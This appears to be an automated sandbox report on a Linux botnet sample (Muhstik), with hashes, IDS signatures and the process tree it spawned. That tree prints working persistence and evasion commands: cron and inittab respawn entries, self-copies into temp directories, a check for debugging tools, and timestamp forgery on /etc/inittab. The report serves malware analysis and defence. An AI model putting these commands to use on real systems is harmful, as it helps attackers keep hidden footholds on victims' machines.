Analysis
-
max time kernel
11949s -
max time network
154s -
platform
linux_amd64 -
resource
ubuntu1804-amd64-en-20211208 -
submitted
25-04-2022 23:53
Static task
static1
Behavioral task
behavioral1
Sample
pty4pimkkvvs
Resource
ubuntu1804-amd64-en-20211208
0 signatures
0 seconds
General
-
Target
pty4pimkkvvs
-
Size
90KB
-
MD5
60f50372901a3ab6be093cb9922fd75c
-
SHA1
03fabbbc736a5c59b889e3675331c96263d4a4a6
-
SHA256
16b4093813e2923e9ee70b888f0d50f972ac607253b00f25e4be44993d263bd2
-
SHA512
480ce401e171d29483b5ddf2b732f8959daba11c8b25538d179cc93795594676aaec3ae078cd312743a9cecf78ba533a58ced339fa63e2b5e53b9077933d0e6b
Score
10/10
Malware Config
Signatures
-
suricata: ET MALWARE ELF/Muhstik Botnet CnC Activity
suricata: ET MALWARE ELF/Muhstik Botnet CnC Activity
-
Reads runtime system information (4 IoCs)
Reads data from /proc virtual filesystem.
Processes:
description | ioc | process
/proc/filesystems | /proc/filesystems | cp
/proc/filesystems | /proc/filesystems | cp
/proc/filesystems | /proc/filesystems | cp
/proc/filesystems | /proc/filesystems | cp
-
Writes file to tmp directory (4 IoCs)
Malware often drops required files in the /tmp directory.
Processes:
description | ioc | process
/tmp/pty4pimkkvvs | /tmp/pty4pimkkvvs | cp
/tmp/pty4pimkkvvs | /tmp/pty4pimkkvvs | cp
/tmp/pty4pimkkvvs | /tmp/pty4pimkkvvs | cp
/tmp/pty4pimkkvvs | /tmp/pty4pimkkvvs | cp
Processes
-
./pty4pimkkvvs./pty4pimkkvvs1⤵PID:570
-
/bin/shsh -c "pidof -x strace > /dev/null"1⤵PID:571
-
/bin/pidofpidof -x strace2⤵PID:572
-
-
/bin/shsh -c "pidof -x tcpdump > /dev/null"1⤵PID:573
-
/bin/pidofpidof -x tcpdump2⤵PID:574
-
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/tmp/pty4pimkkvvs\" > /etc/inittab2"1⤵PID:577
-
/bin/catcat /etc/inittab2⤵PID:579
-
-
/bin/grepgrep -v /tmp/pty4pimkkvvs2⤵PID:582
-
-
/bin/shsh -c "crontab -l | grep /tmp/pty4pimkkvvs | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/pty4pimkkvvs > /dev/null 2>&1 &\") | crontab -"1⤵PID:578
-
/usr/bin/crontabcrontab -l2⤵PID:581
-
-
/bin/grepgrep /tmp/pty4pimkkvvs2⤵PID:584
-
-
/bin/grepgrep -v "no cron"2⤵PID:585
-
-
/usr/bin/crontabcrontab -2⤵PID:588
-
-
/bin/shsh -c "crontab -r"1⤵PID:580
-
/usr/bin/crontabcrontab -r2⤵PID:583
-
-
/bin/shsh -c "echo \"0:2345:respawn:/tmp/pty4pimkkvvs\" >> /etc/inittab2"1⤵PID:586
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:589
-
/bin/catcat /etc/inittab22⤵PID:591
-
-
/usr/bin/crontabcrontab -l1⤵PID:590
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:592
-
/bin/rmrm -rf /etc/inittab22⤵PID:593
-
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:594
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:595
-
-
/bin/shsh -c "/bin/uname -n"1⤵PID:602
-
/bin/uname/bin/uname -n2⤵PID:604
-
-
/bin/shsh -c "cp -f /tmp/pty4pimkkvvs /dev/shm/pty4pimkkvvs"1⤵PID:603
-
/bin/cpcp -f /tmp/pty4pimkkvvs /dev/shm/pty4pimkkvvs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:605
-
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/dev/shm/pty4pimkkvvs\" > /etc/inittab2"1⤵PID:607
-
/bin/catcat /etc/inittab2⤵PID:609
-
-
/bin/grepgrep -v /dev/shm/pty4pimkkvvs2⤵PID:610
-
-
/bin/shsh -c "crontab -l | grep /dev/shm/pty4pimkkvvs | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/pty4pimkkvvs > /dev/null 2>&1 &\") | crontab -"1⤵PID:608
-
/usr/bin/crontabcrontab -l2⤵PID:611
-
-
/bin/grepgrep /dev/shm/pty4pimkkvvs2⤵PID:612
-
-
/bin/grepgrep -v "no cron"2⤵PID:613
-
-
/usr/bin/crontabcrontab -2⤵PID:616
-
-
/bin/shsh -c "echo \"0:2345:respawn:/dev/shm/pty4pimkkvvs\" >> /etc/inittab2"1⤵PID:614
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:617
-
/bin/catcat /etc/inittab22⤵PID:619
-
-
/usr/bin/crontabcrontab -l1⤵PID:618
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:620
-
/bin/rmrm -rf /etc/inittab22⤵PID:621
-
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:622
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:623
-
-
/bin/shsh -c "cp -f /tmp/pty4pimkkvvs /var/tmp/pty4pimkkvvs"1⤵PID:624
-
/bin/cpcp -f /tmp/pty4pimkkvvs /var/tmp/pty4pimkkvvs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:625
-
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/var/tmp/pty4pimkkvvs\" > /etc/inittab2"1⤵PID:627
-
/bin/catcat /etc/inittab2⤵PID:628
-
-
/bin/grepgrep -v /var/tmp/pty4pimkkvvs2⤵PID:630
-
-
/bin/shsh -c "crontab -l | grep /var/tmp/pty4pimkkvvs | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/pty4pimkkvvs > /dev/null 2>&1 &\") | crontab -"1⤵PID:629
-
/usr/bin/crontabcrontab -l2⤵PID:631
-
-
/bin/grepgrep /var/tmp/pty4pimkkvvs2⤵PID:632
-
-
/bin/grepgrep -v "no cron"2⤵PID:633
-
-
/usr/bin/crontabcrontab -2⤵PID:636
-
-
/bin/shsh -c "echo \"0:2345:respawn:/var/tmp/pty4pimkkvvs\" >> /etc/inittab2"1⤵PID:634
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:637
-
/bin/catcat /etc/inittab22⤵PID:639
-
-
/usr/bin/crontabcrontab -l1⤵PID:638
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:640
-
/bin/rmrm -rf /etc/inittab22⤵PID:641
-
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:642
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:643
-
-
/bin/shsh -c "cp -f /tmp/pty4pimkkvvs /var/lock/pty4pimkkvvs"1⤵PID:644
-
/bin/cpcp -f /tmp/pty4pimkkvvs /var/lock/pty4pimkkvvs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:645
-
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/var/lock/pty4pimkkvvs\" > /etc/inittab2"1⤵PID:647
-
/bin/catcat /etc/inittab2⤵PID:648
-
-
/bin/grepgrep -v /var/lock/pty4pimkkvvs2⤵PID:650
-
-
/bin/shsh -c "crontab -l | grep /var/lock/pty4pimkkvvs | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/pty4pimkkvvs > /dev/null 2>&1 &\") | crontab -"1⤵PID:649
-
/usr/bin/crontabcrontab -l2⤵PID:651
-
-
/bin/grepgrep /var/lock/pty4pimkkvvs2⤵PID:653
-
-
/bin/grepgrep -v "no cron"2⤵PID:654
-
-
/usr/bin/crontabcrontab -2⤵PID:658
-
-
/bin/shsh -c "echo \"0:2345:respawn:/var/lock/pty4pimkkvvs\" >> /etc/inittab2"1⤵PID:652
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:655
-
/bin/catcat /etc/inittab22⤵PID:657
-
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:660
-
/bin/rmrm -rf /etc/inittab22⤵PID:661
-
-
/usr/bin/crontabcrontab -l1⤵PID:659
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:662
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:663
-
-
/bin/shsh -c "cp -f /tmp/pty4pimkkvvs /var/run/pty4pimkkvvs"1⤵PID:664
-
/bin/cpcp -f /tmp/pty4pimkkvvs /var/run/pty4pimkkvvs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:665
-
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/var/run/pty4pimkkvvs\" > /etc/inittab2"1⤵PID:667
-
/bin/grepgrep -v /var/run/pty4pimkkvvs2⤵PID:670
-
-
/bin/catcat /etc/inittab2⤵PID:669
-
-
/bin/shsh -c "crontab -l | grep /var/run/pty4pimkkvvs | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/pty4pimkkvvs > /dev/null 2>&1 &\") | crontab -"1⤵PID:668
-
/usr/bin/crontabcrontab -l2⤵PID:671
-
-
/bin/grepgrep /var/run/pty4pimkkvvs2⤵PID:672
-
-
/bin/grepgrep -v "no cron"2⤵PID:673
-
-
/usr/bin/crontabcrontab -2⤵PID:677
-
-
/bin/shsh -c "echo \"0:2345:respawn:/var/run/pty4pimkkvvs\" >> /etc/inittab2"1⤵PID:674
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:675
-
/bin/catcat /etc/inittab22⤵PID:678
-
-
/usr/bin/crontabcrontab -l1⤵PID:679
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:680
-
/bin/rmrm -rf /etc/inittab22⤵PID:681
-
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:682
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:683
-